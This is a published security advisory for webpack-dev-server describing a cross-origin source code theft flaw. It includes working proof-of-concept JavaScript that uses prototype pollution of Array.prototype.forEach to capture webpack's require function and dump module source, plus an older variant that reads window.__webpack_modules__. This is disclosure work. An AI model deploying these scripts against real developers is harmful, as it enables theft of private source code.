GHSA-4v9v-hfq4-rm2v
Suggest an improvement- Source
- https://github.com/advisories/GHSA-4v9v-hfq4-rm2v
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-4v9v-hfq4-rm2v/GHSA-4v9v-hfq4-rm2v.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-4v9v-hfq4-rm2v
- Aliases
- Published
- 2025-06-04T21:09:13Z
- Modified
- 2025-06-04T21:09:13Z
- Severity
-
- 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N CVSS Calculator
- Summary
- webpack-dev-server users' source code may be stolen when they access a malicious web site
- Details
-
Summary
Source code may be stolen when you access a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject
<script src="http://localhost:8080/main.js">in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By usingFunction::toStringagainst the values in__webpack_modules__, the attacker can get the source code.PoC
- Download reproduction.zip and extract it
- Run
npm i - Run
npx webpack-dev-server - Open
https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/ - You can see the source code output in the document and the devtools console.
The script in the POC site is:
let moduleList const onHandlerSet = (handler) => { console.log('h', handler) moduleList = handler.require.m } const originalArrayForEach = Array.prototype.forEach Array.prototype.forEach = function forEach(callback, thisArg) { callback((handler) => { onHandlerSet(handler) }) originalArrayForEach.call(this, callback, thisArg) Array.prototype.forEach = originalArrayForEach } const script = document.createElement('script') script.src = 'http://localhost:8080/main.js' script.addEventListener('load', () => { console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } }) document.head.appendChild(script)This script uses the function generated by
renderRequire.// The require function function __webpack_require__(moduleId) { // Check if module is in cache var cachedModule = __webpack_module_cache__[moduleId]; if (cachedModule !== undefined) { return cachedModule.exports; } // Create a new module (and put it into the cache) var module = __webpack_module_cache__[moduleId] = { // no module.id needed // no module.loaded needed exports: {} }; // Execute the module function var execOptions = { id: moduleId, module: module, factory: __webpack_modules__[moduleId], require: __webpack_require__ }; __webpack_require__.i.forEach(function(handler) { handler(execOptions); }); module = execOptions.module; execOptions.factory.call(module.exports, module, module.exports, execOptions.require); // Return the exports of the module return module.exports; }Especially, it uses the fact that
Array::forEachis called for__webpack_require__.iandexecOptionscontains__webpack_require__. It uses prototype pollution againstArray::forEachto extract__webpack_require__reference.Impact
This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.
<details> <summary>Old content</summary>
Summary
Source code may be stolen when you use
output.iife: falseand access a malicious web site.Details
When
output.iife: falseis set, some global variables for the webpack runtime are declared on thewindowobject (e.g.__webpack_modules__). Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject<script src="http://localhost:8080/main.js">in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on thewindowobject. By usingFunction::toStringagainst the values in__webpack_modules__, the attacker can get the source code.I pointed out
output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on thewindowobject, the same will apply for those cases.PoC
- Download reproduction.zip and extract it
- Run
npm i - Run
npx webpack-dev-server - Open
https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/ - Open the devtools console.
- You can see the content of
src/index.jsand other scripts loaded.
The script in the POC site is:
const script = document.createElement('script') script.src = 'http://localhost:8080/main.js' script.addEventListener('load', () => { for (const module in window.__webpack_modules__) { console.log(`${module}:`, window.__webpack_modules__[module].toString()) } }) document.head.appendChild(script)Impact
This vulnerability can result in the source code to be stolen for users that has
output.iife: falseoption set and uses a predictable port and output path for the entrypoint script.</details>
- Database specific
{ "github_reviewed_at": "2025-06-04T21:09:13Z", "nvd_published_at": "2025-06-03T18:15:25Z", "github_reviewed": true, "cwe_ids": [ "CWE-749" ], "severity": "MODERATE" }- References
Affected packages
npm / webpack-dev-server
Package
- Name
- webpack-dev-server
- View open source insights on deps.dev
- Purl
- pkg:npm/webpack-dev-server